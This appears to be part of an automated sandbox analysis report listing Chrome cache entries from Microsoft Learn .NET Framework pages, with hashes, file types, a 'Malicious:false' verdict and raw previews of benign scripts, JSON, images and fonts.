                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

                                                                                                                                                                                            Chrome Cache Entry: 293

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                                                                                                                                                            Chrome Cache Entry: 294

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

                                                                                                                                                                                            Chrome Cache Entry: 295

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

                                                                                                                                                                                            Chrome Cache Entry: 296

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1817143
                                                                                                                                                                                            Entropy (8bit):5.501007973622959
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                            MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                            SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                            SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                            SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

                                                                                                                                                                                            Chrome Cache Entry: 297

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

                                                                                                                                                                                            Chrome Cache Entry: 298

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                                                                                                                                            Chrome Cache Entry: 299

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

                                                                                                                                                                                            Chrome Cache Entry: 300

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                                                                                                                                            Chrome Cache Entry: 301

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

                                                                                                                                                                                            Chrome Cache Entry: 302

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (33273), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):33273
                                                                                                                                                                                            Entropy (8bit):4.918756013698695
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
                                                                                                                                                                                            MD5:86E84C732A96BF9CF18C99B48DB90B6D
                                                                                                                                                                                            SHA1:6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
                                                                                                                                                                                            SHA-256:B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
                                                                                                                                                                                            SHA-512:AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

                                                                                                                                                                                            Chrome Cache Entry: 303

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

                                                                                                                                                                                            Chrome Cache Entry: 304

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):19696
                                                                                                                                                                                            Entropy (8bit):7.9898910353479335
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                            MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                            SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                            SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                            SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
                                                                                                                                                                                            Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]

                                                                                                                                                                                            Chrome Cache Entry: 305

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):64291
                                                                                                                                                                                            Entropy (8bit):7.964191793580486
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                            MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                            SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                            SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                            SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

                                                                                                                                                                                            Chrome Cache Entry: 306

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
